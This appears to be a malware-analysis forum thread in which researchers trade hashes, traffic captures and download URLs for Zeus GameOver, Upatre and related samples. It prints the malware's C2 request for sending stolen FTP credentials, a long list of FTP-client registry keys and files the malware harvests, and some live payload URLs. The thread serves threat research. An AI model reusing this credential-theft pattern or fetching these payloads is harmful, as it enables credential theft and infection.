[Win32:Virut]

MD5: CD77C349AD031DBC9BBA76DAA72A24CB
SHA1: 4A8864E9CF830A0D118050F7C28492B0417F80F8
SHA256: 4CD3BC38DAF20E26872784BF75478041A04D1D124ADFFB6C7973723150078AFB
https://www.virustotal.com/en/file/4cd3 ... /analysis/
https://malwr.com/analysis/Y2M2ZmUwZjc2 ... g4M2E1YWY/

[unixfreaxjp]

This Zeus/gameover was downloading from Fareit I reported HERE.
VT detection ratio is too low (3/46) https://www.virustotal.com/en/file/6335 ... 375438407/

The sample was downloaded from this remote host:

Code: Select all

GET /hc53.exe HTTP/1.1
Accept: */*
Accept-Language: ja
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: esmallboxes.com
Connection: Close
  :
HTTP/1.1 200 OK
Content-Length: 199168
Content-Type: application/octet-stream
Last-Modified: Thu, 01 Aug 2013 16:34:50 GMT
Accept-Ranges: bytes
ETag: "7a4646bd58ece1:428ef"
Server: Microsoft-IIS/6.0
X-Powered-By-Plesk: PleskWin
X-Powered-By: ASP.NET
Date: Fri, 02 Aug 2013 08:35:10 GMT
Connection: close

AutoStart path:

Code: Select all

Software\Microsoft\Windows\CurrentVersion\Run

Poking remote host with HTTP/1.1 with below User-Agent & headers

Code: Select all

GET HTTP/1.1
Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
X-Real-IP: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
gzip
5629186B-0207-4659-AE5D-B09282932A86

Using POST Method for posting ftp credentials of infected PC:

Code: Select all

HTTP/1.1
Mozilla/5.0 (Windows; U; Windows NT 5.1)
index_get.php?key=YRHDXCF&action=ADD_FTP&id=%s&ftp_host=%s&ftp_login=%s&ftp_pass=%s
Transfer-Encoding: chunked
Content-Length:
Content-Encoding: gzip

This is the FTP credentials aimed:

Code: Select all

Software\VanDyke\SecureFX
Config Path
\Sessions
DataFolder
Software\FTPRush
RushSite.xml
Software\UltraFXP
Sites.xml
Estsoft\ALFTP\ESTdb2.dat
Software\Microsoft\Windows\CurrentVersion\Uninstall
FTP Commander
FTP Navigator
InstallLocation
UninstallString
%s\TurboFTP\addrbk.dat
%s:%s:%s:%s
%s:%s:%s:%s:%d
%s\SmartFTP\Client 2.0\Favorites
%s\*.xml
<Host>
<Host>
</Host>
<Port>
<Port>
</Port>
<User>
<User>
</User>
<Password>
<Password>
</Password>
%s:%s:%s:%s
%s:%s:%s:%s:%s
ixKZ-<
host
uid
pwd
software\ipswitch\ws_ftp
DataDir
%s\sites\ws_ftp.ini
connections
host
username
password
anonymous
e-mail
general
GHISLER
FtpIniName
Install_Dir
InstallDir
pstorec.dll
crypt32.dll
PStoreCreateInstance
CryptUnprotectData
FileZilla\FileZilla.xml
FileZilla\RecentServers.xml
FileZilla\SiteManager.xml
Server 
Site 
Install_Dir
FileZilla.xml
Last Server Pass
Last Server User
Last Server Host
\QCToolbar
QCHistory
\GlobalSCAPE
HostName
User
Password
software\far\plugins\ftp\hosts
software\far2\plugins\ftp\hosts
Username
Hostname
Password
User
Host
Software\FTPWare\CoreFTP\Sites
hdfzpysvpzimorhk
USER
HOST
PASS
E+ts
UID
URL
Encrypt_PW
User
Server
Password
Ftplist.txt
Password
HostName
Username
Software\CoffeeCup Software\Internet\Profiles
robert249fsd)af8.?sf2eaya;sd$%85034gsn%@#!afsgsjdg;iawe;otigkbarr
q9IN
%AppData%\..\Local\VirtualStore\Program Files\Total Commander
wcx_ftp.ini
Software\Ghisler
WininetCacheCredentials
DPAPI: 
internet explorer
MS IE FTP Passwords
Run in Secure Mode
%AppData%\..\Local\VirtualStore\Program Files\FileZilla
FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
Software\FileZilla
Software\FileZilla\Site Manager
User
Host
Pass
%s:%s:%s:%s
\*.ini
\Software\GlobalSCAPE\

Checked mail softwares..

Code: Select all

Software\Microsoft\WAB\DLLPath
Microsoft Outlook
SOFTWARE\Clients\Mail
SOFTWARE\Clients\Mail\Microsoft Outlook

Open WAB/Outlook Express to get IDs..

Code: Select all

WABOpen
Identities
Microsoft\Outlook Express
*.dbx
MSWQ*.tmp

[R136a1]

hxxps://1qazxsw2obiwanhuyontop.com/proga.exe
hxxps://216.194.165.222/bomberman.exe
hxxps://actorsneedwebsites.com/tron/8mo.exe
hxxps://awcoomer.com/house/tp7.exe
hxxps://bytecloud.biz/feeds/rhk.exe
hxxps://cardiffpower.com/day1/dusp.exe
hxxps://ce-cloud.com/images/note.exe
hxxps://ciderbrokers.com/images/10ring.exe
hxxps://cyclivate.com/wp-admin/xtsg.exe
hxxps://dcmsservices.com/egg/rchp.exe
hxxps://gov-l.com/go/da.exe
hxxps://huyontop.com/agorp.exe
hxxps://huyontop.com/proga.exe
hxxps://leisuremaintenanceltd.com/night/3moon.exe
hxxps://paydaypedro.co.uk/p1/d2.exe
hxxps://rockeyracing.com/images/06morning.exe
hxxps://sicherhosting.com/career/rc.exe
hxxps://talonstamed.com/gen/dous8.exe
hxxps://thesafeconsumer.com/safe/8mor.exe
hxxps://thisaintpc.com/downloads/tehb.exe
hxxps://thisisyourwife.co.uk/plugins/system/Update.exe
hxxps://whitewaterexcitement.com/files/nbt.exe
hxxps://www.c3dsolutions.com/set/do6.exe
hxxps://zestimports.com/book/12Mo.exe

http://www.secureworks.com/cyber-threat ... ownloader/

[Xylitol]

https://www.virustotal.com/en/file/44bd ... 389818864/

[Xylitol]

Fresh sample found yesterday from a 18kb file
http://malwaredb.malekal.com/index.php? ... eaba2593b5
http://malwaredb.malekal.com/index.php? ... 3a62e64444
Downloading:

Code: Select all

https://gwentpressurewashers.co.uk/images/stories/food/wav.exe (can be downloaded without ssl but the file download it via)
http://thisisyourwife.co.uk/images/banners/heap.exe

https://www.virustotal.com/en/file/f063 ... 389956077/
https://www.virustotal.com/en/file/e33c ... 389956081/
https://www.virustotal.com/en/file/f080 ... 389956086/
https://www.virustotal.com/en/file/b0d9 ... 389956087/

[Xylitol]

To resume what's happened those weeks:
Last clear sample before the encryption '.enc' appeared: 01-24 - http://vxvault.siri-urz.net/ViriList.ph ... 2A31F722AB
Now, this one: http://malwaredb.malekal.com/index.php? ... 9f558408e6
Detected as Upatre by Malwarebytes the 27 Jan download the following:

Code: Select all

http://at-tuqa.com/images/banners/pdf.enc (still active)

This one of the 24: http://malwaredb.malekal.com/index.php? ... 01051d9416 (again Upatre)
24: http://malwaredb.malekal.com/index.php? ... 5140ec72c6

So if we haven't missed a sample, Zeus gameover gang have started to use encryption the 24 January.
Gary Warner is the first person who talked (publicly) about the new encryption: http://garwarner.blogspot.fr/2014/02/ga ... on-to.html (02 Feb)
Thanks to siri for helping me to retrace the date of first use.

Related articles about the encryption:
CrySyS Blog - GameOver Zeus now uses Encryption to bypass Perimeter Security – .enc encryption
Kahu Security - Exploring XOR Decryption Methods
siri - ZeuS GameOver decoder
---
Upatre:
First submission 2014-01-23: https://www.virustotal.com/en/file/e503 ... 392476566/
First submission 2014-01-24: https://www.virustotal.com/en/file/1317 ... 392476567/
First submission 2014-01-27: https://www.virustotal.com/en/file/97a5 ... 392476567/

Zeus Gameover 'last' clear sample:
First submission 2014-01-23: https://www.virustotal.com/en/file/e3b1 ... 392476682/

Zeus Gameover 'first' encoded sample (downloaded from Upatre: bc20cd3aaad285fa8820c901051d9416):
https://www.virustotal.com/en/file/2fc9 ... 392480407/

[SomeUnusedName]

Am I missing something or is all the fuzz basically about some downloader used for Zeus Gameover which now encrypts its payload? How's that anything special? It's not like other downloader bots don't do it.

[forty-six]

Something missing in Xylitol's post is, upatre is not the only way GMO is being delivered. Just one of the ways.

Caught it via Andromeda too.

Lately getting dropped via Angler EK.

[Cody Johnston]

http://nakedsecurity.sophos.com/2014/02 ... e-rootkit/

[EP_X0FF]

Sample here -> http://www.kernelmode.info/forum/viewto ... &start=230
Always like articles where authors reinvent the wheel, describing known for years Necurs driver agent as something new.